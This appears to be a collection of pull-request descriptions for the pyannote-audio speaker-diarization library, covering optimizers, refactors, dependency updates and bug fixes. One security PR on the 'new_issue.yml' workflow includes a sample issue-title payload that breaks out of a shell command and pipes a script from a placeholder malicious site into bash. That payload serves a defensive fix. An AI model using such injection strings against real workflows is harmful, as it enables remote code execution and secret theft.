pyannote/pyannote-audio

pyannote/audio/optimizers.py

I've added two very good optimizers:
- SMORMS3 based on "RMSprop loses to SMORMS3 - Beware the Epsilon!" http://sifter.org/~simon/journal/20150420.html
- SSMORMS3 which stands for Stabilized SMORMS3 and is a personal modification in which the estimation of the gradient's noise is smoothed leading to better convergence

Adding SMORMS3 and SSMORMS3 as Keras optimizers

---

pyannote/audio/callback.py
pyannote/audio/embedding/base.py
pyannote/audio/embedding/glue.py
pyannote/audio/embedding/triplet_loss/__init__.py
pyannote/audio/embedding/triplet_loss/generator.py
pyannote/audio/embedding/triplet_loss/glue.py

- refactor: embedding architecture, optimizer, and `log_dir` are now
passed at `fit` time
- refactor: `get_embedding` is renamed to `extract_embedding`
- refactor: `design_model` is renamed to `build_model`
- refactor: `__call__` is renamed to `loss`
- feat: generators (and optimizers) can now define their own callback
- feat: `TripletGenerator` defines its own `on_batch_begin` update
callback

refactor: make loss, embedding, and generator less intricate

---

pyannote/audio/labeling/tasks/base.py

Missing import
flake8 testing of https://github.com/pyannote/pyannote-audio on Python 3.6.3
$ __flake8 . --count --select=E901,E999,F821,F822,F823 --show-source --statistics__
```
./pyannote/audio/signal.py:97:30: F821 undefined name 'data'
mini = np.nanmin(data)
^
./pyannote/audio/signal.py:98:30: F821 undefined name 'data'
maxi = np.nanmax(data)
^
./pyannote/audio/signal.py:101:37: F821 undefined name 'data'
mini = np.nanpercentile(data, 1)
^
./pyannote/audio/signal.py:102:37: F821 undefined name 'data'
maxi = np.nanpercentile(data, 99)
^
./pyannote/audio/embedding/clustering.py:283:14: F821 undefined name 'l2_normalize'
fC = l2_normalize(
^
./pyannote/audio/labeling/tasks/base.py:128:17: F821 undefined name 'warnings'
warnings.warn(msg)
^
./pyannote/audio/pipeline/base.py:177:45: F821 …
```

import warnings for line 129 of labeling/tasks/base.py

---

pyannote/audio/applications/base.py
pyannote/audio/applications/speech_detection.py
setup.py

- fixing import in pyannote.audio.applications.speech_detection
- allow torch version to be >= 4.0
- when loading torch model, check GPU/CPU like torch.load('model.pt', map_location=lambda storage, loc: storage)

Small fixes to import, setup, and model loading

---

tutorials/models/speaker_change_detection/README.md

There was a small typo in the SCD tutorial README.

Fixed a typo in SCD tutorial

---

pyannote/audio/applications/base.py
pyannote/audio/applications/feature_extraction.py
pyannote/audio/features/precomputed.py

Due to security issues with the `yaml.load` function, a `Loader` must be specified.
I chose `yaml.BaseLoader` which only parses basic python objects such as dictionnaries, lists and strings. `config.yml` files in pyannote does not need more but it could be replaced easily by another Loader if needed.
See https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation for more details.

Specified YAML Loader to BaseLoader.

---

pyannote/audio/applications/base.py
pyannote/audio/applications/feature_extraction.py
pyannote/audio/features/precomputed.py

Due to security issues when using the `yaml.load` function, the attribute `Loader` has to be set to a secure loader. Several are available and we chose `yaml.SafeLoader`.
For more information, see https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation.

Changed YAML Loader to SafeLoader.

---

pyannote/audio/applications/base.py
pyannote/audio/applications/base_labeling.py
pyannote/audio/applications/change_detection.py
pyannote/audio/applications/overlap_detection.py
pyannote/audio/applications/speech_detection.py
pyannote/audio/pipeline/overlap_detection.py
pyannote/audio/pipeline/speech_activity_detection.py
tutorials/models/overlap_detection/README.md
tutorials/models/speaker_change_detection/README.md
tutorials/models/speech_activity_detection/README.md

- "apply" mode now expects a path to the validation directory as input, and read everything from the `params.yml` file directly.
- "apply" mode now creates its output as a sub-directory of the validation directory.
- "apply" mode now creates RTTM files directly (and evaluate the performance, when applicable)

BREAKING: update behavior of labeling "apply" mode 

---

tutorials/models/speaker_embedding/README.md

Add the --duration paramater for the validation step in Speaker-Embedding tutorial.

fix duration param in speaker embedding tutorial, for validation, partial fix for #230

---

pyannote/audio/applications/pyannote_audio.py

- New `--debug` option to use PyTorch's anomaly detection when executing
- This raises errors when NaN values are found (and they point to the actual line where they appear)
- A warning is shown to the user when the option is activated, as execution can be slowed down

Debug option to detect anomalies

---

pyannote/audio/embedding/approaches/arcface_loss.py
pyannote/audio/embedding/approaches/coco_loss.py

- Parameters `s` in `AdditiveAngularMarginLoss` and `alpha` in `CongenerousCosineLoss` have a new default value: `sqrt(2) * log(n_classes-1)`, as suggested in the [AdaCos paper](https://arxiv.org/abs/1905.00292)
- Parameters `s` and `alpha` renamed to `scale`. Compatibility with the previous names is kept but with a deprectation warning
- Improved the documentation for these 2 losses

feat: add AdaCos trick for automatic scaling in ArcFace and CoCo loss

---

tutorials/models/speech_activity_detection/README.md

Removed spaces around '=' sign
$ export VAL_DIR = ${TRN_DIR}/validate/AMI.SpeakerDiarization.MixHeadset.development ,
otherwise `bash: export: `=': not a valid identifier` is thrown

small corrections in validation step

---

tutorials/pretrained/model/README.md

Adding example of specifying batch_size or device when pulling models from torch.hub

More kwargs of torch.hub.load

---

pyannote/audio/features/pretrained.py
pyannote/audio/train/model.py

Following [this tutorial](https://github.com/pyannote/pyannote-audio/tree/develop/tutorials/pretrained/model) which consists of running a model pretrained on AMI reduced the memory from 5274.61 Mb (without **torch.no_grad()**) to 1691.49 Mb (with it).

Add torch.no_grad() during inference time

---

pyannote/audio/cli/train.py
pyannote/audio/cli/train_config/augmentation/background.yaml
pyannote/audio/core/task.py
pyannote/audio/tasks/segmentation/multi_task_segmentation.py
pyannote/audio/tasks/segmentation/overlapped_speech_detection.py
pyannote/audio/tasks/segmentation/speaker_change_detection.py
pyannote/audio/tasks/segmentation/speaker_tracking.py
pyannote/audio/tasks/segmentation/voice_activity_detection.py
pyannote/audio/tasks/speaker_verification/task.py
requirements.txt

@mogwai, I went with a simple (simplistic?) support of torch_audiomentations waveform transforms, by overriding the dataloader's collate function.

feat: add support for torch_audiomentations waveform transforms

---

pyannote/audio/core/inference.py

Segmentation models tend to work better at the center of an audio chunk than at its boundaries.
Therefore, using this window, we give more weights to the center than to the boundaries when aggregating overlapping chunks. 
While it was not that important in pyannote.audio 1.1 because scores were aggregated in the log-domain (where low scores quickly become almost zero), it is needed in pyannote.audio 2.0 because scores are aggregated in the [0, 1]  domain.
Hence, without this window, one would notice overlap artifacts:
which are completely gone with the addition of the window:

feat: use Kaiser window for inference overlap-add aggregation

---

pyannote/audio/core/io.py

As I expected, I stumbled upon out-of-bounds errors in `Audio.crop` when training large scale models.
These errors result from small rounding errors due to the time-to-frame conversion.

fix: handle Audio.crop corner case with small rounding error

---

pyannote/audio/core/io.py
requirements.txt

I've increased the required version of torchaudio required to run pyannote from `0.6.0` to `0.7.0.
I've also set the backend to use to be the new `sox_io` instead of the `soundfile` interface. 
This is to prepare for the coming changing in `0.8.0` that will make `sox_io` the default.

chore: torchaudio >= 0.7.0 and the new sox_io interface

---

pyannote/audio/models/blocks/pooling.py
pyannote/audio/models/embedding/xvector.py

cc @juanmc2005 
This PR allows the statistics pooling layer in xvector-like speaker embedding to give more weights to regions where the probability that a speaker is active is higher.  Let's discuss why this might be useful for you offline in our Slack channel.
```python
from pyannote.audio import Model
speaker_embedding = Model.from_pretrained('hbredin/SpeakerEmbedding-XVectorMFCC-VoxCeleb')
voice_activity_detection = Model.from_pretrained('hbredin/VoiceActivityDetection-PyanNet-DIHARD')
from pyannote.audio.core.io import Audio
audio = Audio(sample_rate=16000)
from pyannote.core import Segment
chunk = Segment(5, 10)
waveform, _ = audio.crop(file, chunk)
waveforms = waveform.unsqueeze(0)
vad = voice_activity_detection(waveforms)
emb = speaker_embedding(waveforms, weights=vad.squeeze(2)) …
```

feat: add support for weighted statistics pooling

---

README.md
pyannote/audio/cli/pretrained.py
pyannote/audio/cli/train.py
pyannote/audio/core/callback.py
pyannote/audio/core/model.py

- feat: track task-dependent layers (i.e. layers that are completely reset when switching task)
- feat: add finetuning / transfer learning callback and use it in CLI
- fix: remove (broken) support for setting `Model.{optimizer, scheduler}` attributes
- doc: update README and CLI to reflect the above fix

feat: make finetuning (or transfer learning) of pretrained models easier and more reliable

---

pyannote/audio/core/inference.py

Regular overlap-add aggregation cannot be used directly for permutation-invariant models.
Why? Because two consecutive chunks may disagree on part of their output -- leading to weird 50/50 local decisions once aggregated. 
This PR makes inference use only the (step-long) central part of each chunk in the final aggregation... essentially switching to a simple concatenation.
Segmentation on DIHARD dev before and after this change:
* False alarm = 5.9%  
* Missed detection = 6.7%
* Confusion = 27.1%
* False alarm = 6.1% (+ 0.2%) 
* Missed detection = 6.8% (+ 0.1%)
* Confusion = 27.3% (+ 0.2%)
The degradation is probably not statistically significant and should be filled by carefully tuning the binarizer...

fix: fix inference of permutation-invariant models

---

pyannote/audio/tasks/segmentation/mixins.py
pyannote/audio/tasks/segmentation/segmentation.py

Reasoning: remote tensorboard visualization is slow, most likely due to too many images being logged.
Solution: only log images every 10 epochs (instead of every epoch)

fix: only log visual output every 10 epochs

---

pyannote/audio/cli/pretrained.py
pyannote/audio/cli/train.py
pyannote/audio/core/model.py
pyannote/audio/models/segmentation/PyanNet.py

When fine-tuning `PyanNet` for a different task, the classification module is always replaced. However, if the task remains the same or the specifications are compatible (feature dimensionality and number of classes) it might be better to keep the pre-trained module instead of replacing it with a randomly initialized one.

fix: don't replace task-dependent classifier if specifications are compatible

---

pyannote/audio/core/io.py

The `Audio.validate_file` method returned without raising a ValueError even when both the `audio` and `waveform` attributes of the file weren't defined.

Fix Audio.validate_file not raising error in one case

---

pyannote/audio/core/model.py

Loading models currently triggers a LightningDeprecationWarning. This PR updates the import to follow the deprecation guideline.

Update ModelSummary to follow PyTorch Lightning's deprecation notice

---

pyannote/audio/pipelines/speaker_verification.py

In order to use an own trained SpeechBrain model, the top directory of SpeechBrain model must be named "speechbrain".
With this change, the use of SpeechBrain will be determined by whether the model name contains "speechbrain" or not.
Related discussion.
https://github.com/pyannote/pyannote-audio/discussions/920

Relax model name of SpeechBrain embedding

---

pyannote/audio/tasks/segmentation/mixins.py

The `SegmentationTaskMixin.prepare_chunk`'s typing indicated a return type of `Tuple[np.ndarray, np.ndarray, List[Text]]` when in reality a `dict` is returned.

fix typing in SegmentationTaskMixin.prepare_chunk

---

pyannote/audio/cli/train.py
pyannote/audio/core/model.py
pyannote/audio/core/task.py
pyannote/audio/tasks/embedding/arcface.py
pyannote/audio/tasks/embedding/mixins.py
pyannote/audio/tasks/segmentation/mixins.py
pyannote/audio/tasks/segmentation/overlapped_speech_detection.py
pyannote/audio/tasks/segmentation/segmentation.py
pyannote/audio/tasks/segmentation/speaker_change_detection.py
pyannote/audio/tasks/segmentation/speaker_tracking.py
pyannote/audio/tasks/segmentation/voice_activity_detection.py
tutorials/add_your_own_task.ipynb

It is currently impossible to change the validation metric used by a task without creating a child class and overriding the relevant methods.
This PR adds a `metrics` parameter in the constructor which allows anything a torchmetrics.MetricCollection can allow (individual metric, list of metric, dictionary of metrics).
The model.log_dict(...) method is used instead of the model.log(...) one because the Tasks now always work with a MetricCollection instead of a Metric.
Child class of methods may still define a default metric through overriding `get_default_validation_metric`.
And "new" default metrics, although they are now contained in a MetricCollection, are still logged in the exact same fashion with the same naming.
Users that have set the metrics parameter are expected to retrieve the …

Make Task metric(s) specifiable

---

pyannote/audio/torchmetrics/functional/audio/diarization_error_rate.py

In the torchmetrics, when using a scalar threshold, the threshold is initialized with
`threshold = torch.tensor([threshold], dtype=preds.dtype)`
and later used in
`hypothesis = (permutated_preds.unsqueeze(-1) > threshold).float()`
When the preds tensor passed is on a cuda device, this could result in a runtime error :
`RuntimeError: Expected all tensors to be on the same device, but found at least two devices, cuda:0 and cpu!`
This PR simply changes threshold declaration to
`threshold = torch.tensor([threshold], dtype=preds.dtype, device=preds.device)`

Fix torchmetrics DER threshold being on a different device when using cuda

---

README.md

The latest version of PyTorch (1.12) is incompatible with SpeechBrain (used for diarization pipeline)
Update README to recommend installing PyTorch 1.11 with conda
https://pytorch.org/get-started/previous-versions/#v1110
Fixes this issue: https://github.com/pyannote/pyannote-audio/issues/855

Recommend PyTorch 1.11 for SpeechBrain compatibility

---

README.md

earlier it was not showing up as link due to small syntax error

HF page link make visible in readme

---

README.md

I also had to accept the user condition on https://hf.co/pyannote/segmentation.
Otherwise, I was receiving the following error:
`HTTPError: 403 Client Error: Forbidden for url: https://huggingface.co/pyannote/segmentation/resolve/2022.07/pytorch_model.bin (Request ID: <id>)`

Add hf.co/pyannote/segmentation to readme

---

requirements.txt

See https://github.com/pyannote/pyannote-audio/issues/1096
Soundfile 0.11 was released 2 months ago, with improvements and better support for M1 macs: https://github.com/bastibe/python-soundfile/releases/tag/0.11.0

Add support for soundfile 0.11

---

setup.py

Added the encoding to the file read and write, which specifies utf-8 reading for these files.  That way, if you add emoji's in the readme, it will not fail on windows terminals.  This was also causing a problem with pipenv and poetry since the setup.py could not be run in a Windows CP1252 Terminal.

Issue_1142_SetupPY_In_CP1252_Terminals_Fails

---

pyannote/audio/tasks/embedding/mixins.py
pyannote/audio/tasks/segmentation/mixins.py
requirements.txt

With torchmetrics 0.11, AUROC implemention has made a breaking change and now requires to specify the problem type (multiclass/multilabel/binary classification).
(see [v0.10 API](https://torchmetrics.readthedocs.io/en/v0.10.3/classification/auroc.html) vs [v0.11 API](https://torchmetrics.readthedocs.io/en/v0.11.0/classification/auroc.html))
This pull request fixes obsolete ("deprecated" in v0.10.x but still worked) AUROC uses and (should) allow unit tests to pass again.
It also bumps the required torchmetrics version to 0.10 because these new specialized AUROC didn't seem to exist before.
(It's possible I didn't use the right types of AUROC metrics)

Fix AUROC to work with torchmetrics >=0.11 (bump required version to 0.11)

---

pyannote/audio/tasks/segmentation/mixins.py

When using PyTorch-Lightning's `MLFlowLogger` instead of `TensorBoardLogger` during training of segmentation models, the current implementation fails because MLflow's experiment tracking client has a different method for logging figures than Tensorboard. Unfortunately, PyTorch-Lightning doesn't abstract away this logger API difference.
Tested with MLflow and Tensorboard.

Support MLflow along with Tensorboard for logging segmentation task visualizations during validation

---

pyannote/audio/tasks/segmentation/mixins.py
pyannote/audio/tasks/segmentation/segmentation.py

Training crashes on validation while logging the model output figures when the pytorch lightning `Trainer` is given a list of loggers. This is because `LightningModule`s' `.logger` variable is accessed but is None when there are multiple loggers.
The proposed solution is to iterate on the `.loggers` variable, which works for the general case.

Add support for multiple Pytorch Lightning loggers

---

pyannote/audio/tasks/segmentation/multilabel.py
pyannote/audio/tasks/segmentation/overlapped_speech_detection.py
pyannote/audio/tasks/segmentation/speaker_diarization.py
pyannote/audio/tasks/segmentation/voice_activity_detection.py

`np.int`, which aliases the builtin `int`, is deprecated and removed from recent versions. This replaces instances of `np.int` with `int`.

Replace np.int with int

---

pyannote/audio/interactive/common/utils.py
pyannote/audio/pipelines/speaker_diarization.py

After changing the behavior of `Audio` initialization, not all codebase was updated. As a consequence, for example, standard diarization pipeline from Huggingface now crashes with `AssertionErrors` on multi-channel audio. This PR fixes this.

Fix remaining `mono=True` initializations of `Audio`

---

pyannote/audio/pipelines/speaker_diarization.py

add missing "s" to  `return_embeddings`  based on the [actual parameter spelling](https://github.com/pyannote/pyannote-audio/blob/f3935464065f743496df9558b7badaaa5a827c9c/pyannote/audio/pipelines/speaker_diarization.py#L429)

doc: fix typo in diarization usage with return embeddings

---

.github/workflows/new_issue.yml

new_issue.yml is vulnerable to RCE via command injection in issue title.
Currently, the following block simply appends the issue title to the shell command. Since the issue title is under user's control, a malicious entity could create an issue with a title such that it escapes the command meant to be executed and instead execute arbitrary commands, which could lead to a variety of security issues such as deletion of files and issues, exfiltration of environment variables to leak secrets, etc: 
- name: Run Suggest 
- run: faqtory suggest "${{ github.event.issue.title }}" > suggest.md
A simple example of a malicious payload in the issue title can be: 
Security"; curl https://malicious-site.com/malicious-script.sh | bash # 
This would simply close the double quotes and after running faqtory …

Security Update new_issue.yml

---

pyannote/audio/tasks/segmentation/multilabel.py

#1385 updated one string incorrectly

Fix val_monitor "ValLoss" -> "loss/val" in multilabel task

---

CHANGELOG.md
pyannote/audio/pipelines/speaker_verification.py

@asr-pub: this is a more generic attempt at solving #1522 as it uses the internal `self.device` that can be set by `WeSpeakerPretrainedEmbeddding.to(device)` (and does not force using GPU when available). Can you please try it out and confirm that this solves your issue?
@juanmc2005: side effect of this PR is that it should solved #1518. Can you please try it out and confirm?

fix: compute fbank on selected device

---

CHANGELOG.md
pyannote/audio/pipelines/clustering.py
tests/test_clustering.py

Fixes #1525.  I can reuse the reproduction example as a test if you think it's a good idea.

fix: force nb clusters to match target only when needed

---

CHANGELOG.md
pyannote/audio/pipelines/clustering.py
pyannote/audio/pipelines/resegmentation.py
pyannote/audio/pipelines/speaker_diarization.py
pyannote/audio/pipelines/utils/diarization.py

The number of labels in the diarization result was based on the result of `speaker_count` method, which did not account for `max_speakers` variable or the actual detected number of speakers after clusterization. This led to the appearance of additional erroneous speakers in the diarization result, so the output could have more labels than provided `max_speakers` or more labels than number of clusters detected by the clusterization algorithm. This PR fixes this.
Additionally, the extra binarization step was removed from `speaker_count` method - now it accepts segmentations in already binarized form, so no extra binarization step in the pipeline is done.

Fix instantaneous speaker count exceeding `max_speakers` or detected number of clusters

---

CHANGELOG.md
pyannote/audio/tasks/segmentation/mixins.py

Fixes the incorrect implementation of `train__len__` introduced in 7121a73f08ec89d8293a8d95145e623675abbe21 (i think).
This error makes training epochs contain `(annotated_duration_train + annotated_duration_val) / model_duration` samples instead of `(annotated_duration_train) / model_duration` samples.

fix(task): fix estimation of training set size

---

CHANGELOG.md
pyannote/audio/utils/random.py

Currently, the seeding in `random.py`'s `create_rng_for_worker` function rely on python's `hash` function. However python's default hashing function is not deterministic between runs.
Since we don't use the hashing for cryptographic purposes, (and although we are not really constrained on execution time either : the function should be called N_WORKERS times at the beginning of each epoch) I opted for the default python implementation of adler32 which should work just fine.
From what I have tried, only `seed_everything` (no need to put it before imports) and `Trainer(..., deterministic=True)` are required to make runs fully deterministic.
Not required:
- `torch.use_deterministic_algorithms(True)`: which force using pytorch's slower but deterministic functions
- defining environment …

Fix seeding in `create_rng_for_worker`

---

pyannote/audio/utils/powerset.py

Change description in docstring from "logit" to "log probability" as described in #1703

doc: fix typo in powerset docstring

---

CHANGELOG.md
pyannote/audio/core/task.py

When using the following protocol, with no development subset defined : 
```yml
EmbeddingsTaskOnlyMini:
train:
VoxCeleb.SpeakerVerification.VoxCelebMini: [train, ]
development:
```
I encountered this  error:
```
Traceback (most recent call last):
File "/gpfsdswork/projects/rech/bvr/uaf83xi/eend_2/joint/test_train.py", line 40, in <module>
trainer.fit(model)
File "/gpfsdswork/projects/rech/bvr/uaf83xi/micromamba/envs/pyannote/lib/python3.9/site-packages/pytorch_lightning/trainer/trainer.py", line 544, in fit
call._call_and_handle_interrupt(
File "/gpfsdswork/projects/rech/bvr/uaf83xi/micromamba/envs/pyannote/lib/python3.9/site-packages/pytorch_lightning/trainer/call.py", line 44, in _call_and_handle_interrupt
return trainer_fn(*args, **kwargs)
File …
```

Fix validation preparation issue when a protocol does not define a development set

---

CHANGELOG.md
pyannote/audio/core/inference.py

While diarizing long audio recordings (>6 hours), I noticed very high memory usage, upwards of 30GB.
I tracked the spike to `pyannote.audio.core.inference.Inference.aggregate()`, which was initializing several very large tensors. 
With this PR, RAM usage is reduced by 10 - 15 GB for long audio files in my tests. I have not tested extensively, but I do not believe this impacts accuracy or speed.
I did have one question related to one of the commits,
> currently, frames is recreated only so that it has the same start as chunks,
> but from my understanding, there are no cases where chunks.start and frames.start
> would be anything other than 0.0.
Is this a correct assumption? Otherwise, frames should be reinitialized. 
Now, the whole speaker diarization pipeline does not peak past 20GB of …

memory optimizations for pyannote.audio.core.inference.Inference.aggregate()

---

CHANGELOG.md
pyannote/audio/core/inference.py
pyannote/audio/tasks/segmentation/mixins.py
pyannote/audio/tasks/segmentation/speaker_diarization.py
pyannote/audio/tasks/separation/PixIT.py

See:
https://numpy.org/devdocs/release/2.0.0-notes.html

Replace np.NaN (deprecated in NumPy 2.0.0) with np.nan

---

tutorials/community/eval_separation_pipeline.ipynb

For separation, it require the pyannote-audio may be atleast pyannote-audio==3.3.0

Update pyannote-audio installation version number

---

CHANGELOG.md
pyannote/audio/pipelines/speech_separation.py

Fix of the alignment between the separated sources and the diarization output.
The issue only occurred when using an "annotation" key to the file to give a reference.
The diarization was then permutated without permutating the associated sources.

Alignment of separation output and diarization

---

CHANGELOG.md
pyannote/audio/tasks/segmentation/speaker_diarization.py

* BREAKING: drop support for multilabel training
* BREAKING: drop support for `warm_up` option
* BREAKING: drop support for `weigh_by_cardinality`
* BREAKING: drop support for `vad_loss`
* improve: improve docstring
* feat: add support for manual optimization (with gradient clipping)

BREAKING(task): drop support for multilabel training

---

CHANGELOG.md
README.md

Small PR - updates `PyTorch` reference to be `https://pytorch.org` in order to solve the broken link.

doc: update PyTorch reference

---

CHANGELOG.md
pyannote/audio/pipelines/speech_separation.py

Not applyying `asr_collar` on diarization output allows to decrease DER on AMI-SDM from 28.83% to 25.14% using default parameters for the separation pipeline (those on hugging face).

improvement: do not apply collar on diarization output in separation pipeline

---

CHANGELOG.md
pyannote/audio/core/task.py
pyannote/audio/models/segmentation/SSeRiouSS.py
pyannote/audio/models/separation/ToTaToNet.py
pyannote/audio/pipelines/speech_separation.py
pyannote/audio/tasks/segmentation/speaker_diarization.py
pyannote/audio/tasks/separation/PixIT.py

BREAKING: remove `finetune_wavlm` attributes from the `PixIT` task, and replace it with `walm_frozen` in `Totatonet` separation model, to be consistent with what is done for the segmentation model.

update weights optimization

---

CHANGELOG.md
pyannote/audio/pipelines/speaker_diarization.py
pyannote/audio/pipelines/speech_separation.py

@hbredin
Changed the default embedding model from "pyannote/embedding@2022.07" to "speechbrain/spkrec-ecapa-voxceleb@5c0be3875fda05e81f3c004ed8c7c06be308de1e" in two documentations.

Fixed some documentations

---

tutorials/community/eval_separation_pipeline.ipynb

This PR updates the speech separation pipeline parameters in the evaluation tutorial. The previous parameters were optimized for a different cpWER definition while the new ones are optimized for MeetEval's definition which is also the one used in the tutorial. For more details see Appendix A in v2 of [the PixIT paper](https://arxiv.org/abs/2403.02288).

fix: update pipeline parameters in speech separation tutorial

---

src/pyannote/audio/__main__.py

`pyannote.audio benchmark` now creates a *.yml file containing details about processing speed.

feat(cli): log processing speed in pyannote.audio benchmark

---

src/pyannote/audio/__main__.py

This PR update the `pyannote-audio benchmark` cli:
- fix truncated dataframes when writing them at `.txt` format
- force test with `collar=0` when using command with `--optimize` flag as metric can be slightly better with this collar value than the one given by the optimization.

cli(benchmark): improve command

---

src/pyannote/audio/core/io.py
src/pyannote/audio/tasks/segmentation/mixins.py

- Cast np.float32 to Python float in audio cropping
Ensures decoder.get_samples_played_in_range(start, end) behaves consistently.
Prevents mismatches between expected_num_samples and samples.data.shape caused by rounding differences.
- Pad tensors in collate_X
Adds zero-padding to all tensors in a batch so they have the same length.
Prevents RuntimeError when default_collate tries to stack tensors of different sizes.

Fix: cast np.float32 to float in audio crop and pad tensors in collate_X to avoid size mismatches
